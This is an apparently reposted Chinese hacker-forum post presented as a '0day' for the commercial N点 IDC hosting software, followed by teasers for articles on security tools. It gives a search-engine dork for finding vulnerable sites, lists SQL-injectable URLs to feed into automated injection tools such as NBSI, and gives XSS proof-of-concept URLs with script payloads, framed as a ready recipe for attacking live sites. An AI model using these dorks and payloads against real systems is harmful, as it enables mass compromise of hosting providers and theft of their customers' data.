[转]N点商业版通杀0day 以及利用 ***

hacker5年前黑客文章1055

作者:qingran
首先百度搜索关键字:inurl: (mmdatabase.asp)

我随便列举一个:   www.xxxx.com

修改链接:http://www.xxxx.com:80/Style/news.asp?action=true&RID=1&ID=1

扔入NBSI 或者啊D等各种 *** 工具中

SQL:

http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1

http://www.xxxxxx.com:80/Manage/CreateHost.asp?Url=/Style/memberlogin.asp&PID=11

http://www.xxxxxx.com:80/Manage/CreateMySQL.asp?Url=/Style/memberlogin.asp&PID=9

http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2

XSS证明:

http://www.xxxxxx.com:80/Manage/CreateHost.asp?PID=11&Url=/Style/memberlogin.asp";alert(42873);"

http://www.xxxxxx.com:80/Manage/CreateMySQL.asp?PID=9&Url=/Style/memberlogin.asp";alert(42873);"

http://www.xxxxxx.com:80/Style/domainInquiry.asp?dfcn=true?cndns=88888&button4=88888&checkbox2=.bj.cn<script>alert(42873)</script>

由此可见点就是坑逼中的战斗机   自从用了他我的眼泪都流干了  有做IDC的朋友千万别步我后尘啊   便宜没好货好货不便宜
还是星外吧  你们懂的

作为一个商用程序   安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?

PS:其实我真的很想知道你说N点这SB asp就asp吧  为什么asp还非要MSSQL  这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。   o(︶︿︶)o 唉

标签: 黑客技术

相关文章

专用工具完全免费使用方法

专用工具完全免费使用方法

什么叫Nessus? Nessus是大家都知道的漏洞扫描器之一,非常是Unix电脑操作系统。即便她们在2006年关掉了源码,并在2008年删除了完全免费版本号,该专用工具依然战胜了很多竞争者。该专用...

IDAPro是不是适用全部电脑操作系统?

IDAPro是不是适用全部电脑操作系统?

什么叫IDA Pro? IDA是一个多服务平台(包含Linux)多处理器反汇编和程序调试,程序猿和开发者能够应用它来调节其程序运行。“IDA反汇编和程序调试”在评定编码失败时,早已变成一个火爆的专用...

L1080htCrack是完全免费的吗?

L1080htCrack是完全免费的吗?

什么叫L1080htCrack? L1080htCrack是由Mudge最开始建立的修复和登陆密码审批专用工具。它试着从单独的Windows服务中心,主域控制器,连接网络网络服务器或Active D...

电脑操作系统检验Nmap使用方法

电脑操作系统检验Nmap使用方法

Nmap是一款网络扫描和服务器检验的十分有效的专用工具。 Nmap不是限于只是搜集信息内容和枚举类型,另外能够用于做为一个系统漏洞探测仪或安全性扫描枪。它能够适用winodws,linux,mac等...

什么叫NetworkMiner互联网挖矿由网络信息安全手机

什么叫NetworkMiner互联网挖矿由网络信息安全手机

什么叫NetworkMiner? 互联网挖矿由网络信息安全手机软件经销商Netresec建立。Netresec主要从事互联网调查取证和数据流量剖析的手机软件和程序流程。显而易见,做为安全性技术专业工...

最近路由器密码泄漏事件非常多,公布一组各类路由器默认账号密码,你是否中招?

特别友情提示:最近路由器密码泄漏事件非常多,公布一组各类路由器默认账号密码,你是否中招?亲赶紧改密码吧!! 品牌:ViKing 用户名:adsl 密码:adsl1234 品牌:实达默认IP:...